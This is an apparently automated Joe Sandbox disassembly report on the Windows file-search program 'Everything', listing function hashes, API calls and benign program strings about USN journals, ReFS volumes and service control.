                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Handle$ErrorInformationLastOpen$HeapPerformanceQuery$AllocCloseCounterFrequencyProcess
                                                                                                            • String ID: %f seconds$failed to open dir %016I64x%016I64x %d$readdir %016I64x%016I64x
                                                                                                            • API String ID: 1409481465-1102279386
                                                                                                            • Opcode ID: 1a236ea40dfa70d0109d5b3d1a790a122836a2a0214446e7480da4772b165d16
                                                                                                            • Instruction ID: 48c7f182c616418c53df729461444b46ddb79325dfe09242cce46a1cf8ae7eed
                                                                                                            • Opcode Fuzzy Hash: 1a236ea40dfa70d0109d5b3d1a790a122836a2a0214446e7480da4772b165d16
                                                                                                            • Instruction Fuzzy Hash: E5124B32A09B8986D760CF55F48076AB3A5F789B94F504135EE9E83B68EF3CD454EB00
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalInitializeSection$CountCreateFileTick$ErrorLastMembershipSleepTestToken
                                                                                                            • String ID: (%s)$Open pipe failed %d$\\.\PIPE\Everything Service
                                                                                                            • API String ID: 185704642-1518160418
                                                                                                            • Opcode ID: cdf9d02c16a306a925d54a8d43ba594dd0a56a13593f9e3da843bcc2aad3ebf9
                                                                                                            • Instruction ID: cb00c2f934e990743d1346e9fdfc3be08f8d0131b331ff8ec77ac40e25178fba
                                                                                                            • Opcode Fuzzy Hash: cdf9d02c16a306a925d54a8d43ba594dd0a56a13593f9e3da843bcc2aad3ebf9
                                                                                                            • Instruction Fuzzy Hash: F151B421A08B8A81E751ABA1E5153EA7365FF857A4F400131DE5E83B95FF3CE424E740
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • wait for USN Journal Deletion..., xrefs: 00007FF63D5502FB
                                                                                                            • 8, xrefs: 00007FF63D5503CB
                                                                                                            • DeviceIoControl(%p,FSCTL_DELETE_USN_JOURNAL,%p,%d,NULL,0,%p,0): %d: Failed to wait for USN Journal deletion., xrefs: 00007FF63D55037C
                                                                                                            • waited for USN Journal Deletion (%f seconds), xrefs: 00007FF63D550354
                                                                                                            • DeviceIoControl(%p,FSCTL_QUERY_USN_JOURNAL,0,0,%p,%d,%p,0): %d: Failed to query USN Journal., xrefs: 00007FF63D55040B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$ControlDevice$Sleep
                                                                                                            • String ID: 8$DeviceIoControl(%p,FSCTL_DELETE_USN_JOURNAL,%p,%d,NULL,0,%p,0): %d: Failed to wait for USN Journal deletion.$DeviceIoControl(%p,FSCTL_QUERY_USN_JOURNAL,0,0,%p,%d,%p,0): %d: Failed to query USN Journal.$wait for USN Journal Deletion...$waited for USN Journal Deletion (%f seconds)
                                                                                                            • API String ID: 65603291-1305636442
                                                                                                            • Opcode ID: 71d9008241849830f583c32fe633a53db0463729e0df946539ec87aea2e577ae
                                                                                                            • Instruction ID: fd6fc1bbb76ecbc1c25d9223bf3b4de87ffe705b9b4f03103c36aa3d337ddfce
                                                                                                            • Opcode Fuzzy Hash: 71d9008241849830f583c32fe633a53db0463729e0df946539ec87aea2e577ae
                                                                                                            • Instruction Fuzzy Hash: A541E332A08A5686E7208BA5F44466F76A5FB85398F504135EE4EC3B94FF3CD458E700
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$ControlDevice$PerformanceQuery$CounterFrequencySleep
                                                                                                            • String ID: DeviceIoControl(%p,FSCTL_DELETE_USN_JOURNAL,%p,%d,NULL,0,%p,0): %d: Failed to wait for USN Journal deletion.$Failed to create USN Journal %d$wait for USN Journal Deletion...$waited for USN Journal Deletion (%f seconds)
                                                                                                            • API String ID: 2552921801-2107851576
                                                                                                            • Opcode ID: 8567ebe5e8feea8604b6d469c556fa3f25bd2901da8a114082a5910b5ca2bc15
                                                                                                            • Instruction ID: b771baa778b7e2159806f3c35339e06fb1091524723112740c069103001f4d37
                                                                                                            • Opcode Fuzzy Hash: 8567ebe5e8feea8604b6d469c556fa3f25bd2901da8a114082a5910b5ca2bc15
                                                                                                            • Instruction Fuzzy Hash: C0417132E08B5682E7208FA4F4441AE73A5FB98794F504136EA9DC3B58EF3CD599E740
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,Everything,00007FF63D5394DA), ref: 00007FF63D552FAB
                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,Everything,00007FF63D5394DA), ref: 00007FF63D552FC1
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,Everything,00007FF63D5394DA), ref: 00007FF63D553003
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,Everything,00007FF63D5394DA), ref: 00007FF63D553013
                                                                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,Everything,00007FF63D5394DA), ref: 00007FF63D553020
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,Everything,00007FF63D5394DA), ref: 00007FF63D55302A
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,Everything,00007FF63D5394DA), ref: 00007FF63D553034
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,Everything,00007FF63D5394DA), ref: 00007FF63D55303E
                                                                                                              • Part of subcall function 00007FF63D53F780: GetProcessHeap.KERNEL32(?,?,?,00007FF63D5E8940,?,?,000002DE,00007FF63D5241CB), ref: 00007FF63D53F789
                                                                                                              • Part of subcall function 00007FF63D53F780: RtlFreeHeap.NTDLL(?,?,?,00007FF63D5E8940,?,?,000002DE,00007FF63D5241CB), ref: 00007FF63D53F797
                                                                                                              • Part of subcall function 00007FF63D53F780: GetLastError.KERNEL32(?,?,?,00007FF63D5E8940,?,?,000002DE,00007FF63D5241CB), ref: 00007FF63D53F7A6
                                                                                                              • Part of subcall function 00007FF63D53F780: GetProcessHeap.KERNEL32(?,?,?,00007FF63D5E8940,?,?,000002DE,00007FF63D5241CB), ref: 00007FF63D53F7AE
                                                                                                              • Part of subcall function 00007FF63D53F700: GetProcessHeap.KERNEL32(?,?,?,?,-0000FFFE,00007FF63D5ED8A7,?,?,?,00007FF63D47106C), ref: 00007FF63D53F709
                                                                                                              • Part of subcall function 00007FF63D53F700: HeapAlloc.KERNEL32(?,?,?,?,-0000FFFE,00007FF63D5ED8A7,?,?,?,00007FF63D47106C), ref: 00007FF63D53F717
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CloseHandleProcess$CriticalObjectSectionSingleWait$AllocEnterErrorEventFreeLastLeave
                                                                                                            • String ID: ($Everything$multithreaded sort: items %d, ideal threads %d, actual threads %d
                                                                                                            • API String ID: 10011696-1646308720
                                                                                                            • Opcode ID: bb31358666fc2a7bbc4c8c901eff43cc9e8a1435e0742cfe42a0bbb4428130cc
                                                                                                            • Instruction ID: de9fb99964ce638703c67a3ab8e0aac42adcd1a21f4286277e6abd83414a83b7
                                                                                                            • Opcode Fuzzy Hash: bb31358666fc2a7bbc4c8c901eff43cc9e8a1435e0742cfe42a0bbb4428130cc
                                                                                                            • Instruction Fuzzy Hash: 30D1E376A08B8986EB20CF56E88016E77A1FB99B94F444131DF9E83B58EF3CE554D700
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$Dialog$Event
                                                                                                            • String ID: '$K
                                                                                                            • API String ID: 3674036007-3534090441
                                                                                                            • Opcode ID: fa0c772f65743f105fca88ab64597249357a9794120262532bd6ebd7215050d2
                                                                                                            • Instruction ID: bb8d2a2626697fc7f556ee681bf34124579d4c7ff1d5340e9a1d3affd13fdfe4
                                                                                                            • Opcode Fuzzy Hash: fa0c772f65743f105fca88ab64597249357a9794120262532bd6ebd7215050d2
                                                                                                            • Instruction Fuzzy Hash: 0561EF72A18A5983E744DF66E40426E77A0FBC9B88F048135EE4E87B95EF3DE461D700
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$FileHeap$AllocPointerProcessRead
                                                                                                            • String ID: ReFS$bad ReFS signature: %t$bad refs sector size %u$failed to read all refs boot record %u$failed to read refs boot record %u$failed to set file pointer to refs boot record %u$serial number %I64x, sector size %u, sectors per cluster %u, version %u.%u
                                                                                                            • API String ID: 3067070378-1247208581
                                                                                                            • Opcode ID: 15c97e69292fe3ee9ad46c54158568b96ddd1538e6255454807c539444a37e26
                                                                                                            • Instruction ID: 696fff1e9bf5eab9c2a2efe1ef863815209e4347bef3f5539a29f34f700b0939
                                                                                                            • Opcode Fuzzy Hash: 15c97e69292fe3ee9ad46c54158568b96ddd1538e6255454807c539444a37e26
                                                                                                            • Instruction Fuzzy Hash: AD41E726F1866A46EB01DFA6B4410BAA361BB897E4F040032EF5DC3B55EF3CE495E740
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastPerformanceQuery$CloseControlCounterCreateDeviceFileFrequencyHandle
                                                                                                            • String ID: CreateFileW(): GetLastError(): %d: Failed to open volume %S$\\.\$\\?\volume{$open volume %S$opened %d %f$volume %s is locked or not mounted.
                                                                                                            • API String ID: 3139158654-2134534449
                                                                                                            • Opcode ID: 85b74298029f9b679d8472c2f539c28b853c21450faefadc7dd425f34edbebc4
                                                                                                            • Instruction ID: 14070d2029eb227f356b71b08d76cc40449b625f9d07464e1e4415402e59ce9c
                                                                                                            • Opcode Fuzzy Hash: 85b74298029f9b679d8472c2f539c28b853c21450faefadc7dd425f34edbebc4
                                                                                                            • Instruction Fuzzy Hash: 4841B121A08A5A81FB509BA5E8516BA6360EF853B4F405235ED6DC7BD9FF3CD418E700
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc$_lock
                                                                                                            • String ID: .mixcrt$DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                            • API String ID: 236382262-1161742486
                                                                                                            • Opcode ID: 6703e987f2d94ffd2b48cb88be74922b31ec000e975b956019ed79a42f34f7bd
                                                                                                            • Instruction ID: aaedeb1b19b06d1ff13aa6da14ab73c51abd1f0351eb80a54f5eadb90a63ed3f
                                                                                                            • Opcode Fuzzy Hash: 6703e987f2d94ffd2b48cb88be74922b31ec000e975b956019ed79a42f34f7bd
                                                                                                            • Instruction Fuzzy Hash: 85318D32E09BAA82E7408F91E848BBA73A4FB46784F404139DA5D83795FF3CD585E704
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$Service$Open$CloseControlHandleManagerMessage
                                                                                                            • String ID: Everything Client
                                                                                                            • API String ID: 1439184590-3147354192
                                                                                                            • Opcode ID: 7074499c3c3c2a93c0b071856b6128cc789e90f145999632d9110ec4f4dddd94
                                                                                                            • Instruction ID: 027496e5dee402bbd60e0b4f198ad3e54c7c753728b49e7053d5683913157741
                                                                                                            • Opcode Fuzzy Hash: 7074499c3c3c2a93c0b071856b6128cc789e90f145999632d9110ec4f4dddd94
                                                                                                            • Instruction Fuzzy Hash: 68216D71E09E5D82F7849FA2A4152AA2361FB49B98F04403AD96E83781EF3CE058A705
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$Service$Open$CloseHandleManagerMessageStart
                                                                                                            • String ID: Everything Client
                                                                                                            • API String ID: 646064412-3147354192
                                                                                                            • Opcode ID: 6c6067dbe52855eb9fca6916536aaba2ff217d8556ae3f66baa2daaa5229737f
                                                                                                            • Instruction ID: 8dd478b8a0801593a2bd7cb67e555a7e37db52e4909b86556409e901344b8cd8
                                                                                                            • Opcode Fuzzy Hash: 6c6067dbe52855eb9fca6916536aaba2ff217d8556ae3f66baa2daaa5229737f
                                                                                                            • Instruction Fuzzy Hash: 5C218261E08E5D82F7549FA2A8152AA6360FF49B88F040436DDADC3791EF3CE068B704
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Event$ClassRegisterSource$DeregisterErrorExitInfoLastProcessReport
                                                                                                            • String ID: .\src\os.c$P$failed to register class %s %d$os_register_class$runas
                                                                                                            • API String ID: 3024293961-3532603909
                                                                                                            • Opcode ID: eb51a8deb41b2e92c2df9b581e3801a886c95c7ab5291c512aab139d69ce9454
                                                                                                            • Instruction ID: ab52638c88a20d712e2d6a4d5e46ad1d99338990fd947af7a5317c237ee55415
                                                                                                            • Opcode Fuzzy Hash: eb51a8deb41b2e92c2df9b581e3801a886c95c7ab5291c512aab139d69ce9454
                                                                                                            • Instruction Fuzzy Hash: FD318D72A18A8A96E760DB51F8507ABB364FB85744F400032EE9D83B55EF3CD144EB00
                                                                                                            APIs
